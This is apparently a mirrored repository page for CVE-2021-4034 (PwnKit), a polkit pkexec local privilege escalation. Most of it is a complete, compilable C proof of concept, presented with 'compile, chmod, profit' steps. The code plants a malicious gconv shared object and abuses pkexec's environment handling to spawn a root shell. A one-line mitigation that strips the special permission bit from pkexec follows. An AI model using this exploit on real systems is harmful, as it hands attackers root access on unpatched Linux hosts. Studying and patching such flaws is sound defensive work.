来源

关联漏洞

描述

Polkit pkexec CVE-2021-4034 Proof Of Concept and Patching

介绍

# CVE-2021-4034
Polkit's Pkexec CVE-2021-4034 Proof Of Concept and Patching

  * [Confirmed on fully patched Ubuntu 21.10](#confirmed-on-fully-patched-ubuntu-2110)
  * [PoC](#poc)
  * [Patching](#patching)


https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

## Confirmed on fully patched Ubuntu 21.10:

![](/Capture3.PNG)

## PoC:
```c
/* Compile: gcc polkit_PoC.c -o PwnKit
* Change perms: chmod +x ./PwnKit
* Profit: ./PwnKit
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shell = 
	"#include <stdio.h>\n"
	"#include <stdlib.h>\n"
	"#include <unistd.h>\n\n"
	"void gconv() {}\n"
	"void gconv_init() {\n"
	"	setuid(0); setgid(0);\n"
	"	seteuid(0); setegid(0);\n"
	"	system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
	"	exit(0);\n"
	"}";

int main(int argc, char *argv[]) {
	FILE *fp;
	system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
	system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
	fp = fopen("pwnkit/pwnkit.c", "w");
	fprintf(fp, "%s", shell);
	fclose(fp);
	system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
	char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
	execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}
```
## Patching:
Remove SGID from /usr/bin/pkexec
```powershell
cd /usr/bin && sudo chmod 0755 ./pkexec
```

文件快照

 [4.0K]  /data/pocs/556ac88d5670d74fcd93564432fd5c32edeb0042
├── [ 80K]  Capture3.PNG
├── [1.5K]  polkit.md
├── [1.2K]  polkit_PoC.c
└── [1.5K]  README.md

0 directories, 4 files

备注